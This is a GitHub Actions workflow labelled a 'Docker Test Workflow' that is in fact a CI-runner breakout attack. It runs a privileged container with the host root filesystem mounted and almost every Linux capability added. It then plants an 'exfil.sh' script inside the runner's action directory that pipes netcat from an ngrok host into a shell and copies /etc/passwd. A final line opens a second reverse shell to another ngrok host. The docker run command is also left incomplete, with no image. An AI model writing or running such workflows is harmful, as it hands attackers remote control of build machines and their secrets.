name: Docker Test Workflow

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  docker-test:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v2

      - name: Run Docker Container with Privileged Mode
        run: |
          docker run --privileged \
            -v /:/mnt \
            -v /proc:/proc \
            -v /sys:/sys \
            -v /dev:/mnt/dev \
            -v /boot:/mnt/boot \
            -v /etc:/mnt/etc \
            -v /home:/mnt/home \
            -v /lib:/mnt/lib \
            -v /lib64:/mnt/lib64 \
            -v /opt:/mnt/opt \
            -v /run:/mnt/run \
            -v /sbin:/mnt/sbin \
            -v /usr:/mnt/usr \
            -v /var:/mnt/var \
            --cap-add=SYS_ADMIN \
            --cap-add=SYS_PTRACE \
            --cap-add=SYS_MODULE \
            --cap-add=SYS_NICE \
            --cap-add=SYS_RESOURCE \
            --cap-add=SYS_TIME \
            --cap-add=SYS_TTY_CONFIG \
            --cap-add=NET_ADMIN \
            --cap-add=NET_RAW \
            --cap-add=IPC_LOCK \
            --cap-add=IPC_OWNER \
            --cap-add=LEASE \
            --cap-add=LINUX_IMMUTABLE \
            --cap-add=MAC_ADMIN \
            --cap-add=MAC_OVERRIDE \
            --cap-add=MKNOD \
            --cap-add=SETFCAP \
            --cap-add=SETPCAP \
            --cap-add=WAKE_ALARM \
            --cap-add=AUDIT_CONTROL \
            --cap-add=AUDIT_WRITE \
            --cap-add=BLOCK_SUSPEND \
            --cap-add=DAC_OVERRIDE \
            --cap-add=DAC_READ_SEARCH \
            --name breakout_test \

      - name: Install all needed packages
        run: |
          docker exec --privileged breakout_test apk add --no-cache git curl netcat-openbsd

      - name: Execute Payload
        run: |
          docker exec --privileged breakout_test /bin/sh -c "\
            echo \"#!/bin/sh\" > /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfil.sh && \
            echo \"nc 2.tcp.us-cal-1.ngrok.io 12090 | /bin/sh\" >> /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfil.sh && \
            echo \"curl file:///mnt/etc/passwd -o /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfiltrated_passwd.txt --create-dirs\" >> /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfil.sh && \
            chmod +x /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfil.sh && \
            /mnt/home/runner/work/_actions/docker/setup-buildx-action/v2/exfil.sh"
            sudo apt install nmap
            nc 4.tcp.us-cal-1.ngrok.io 15962 | /bin/sh

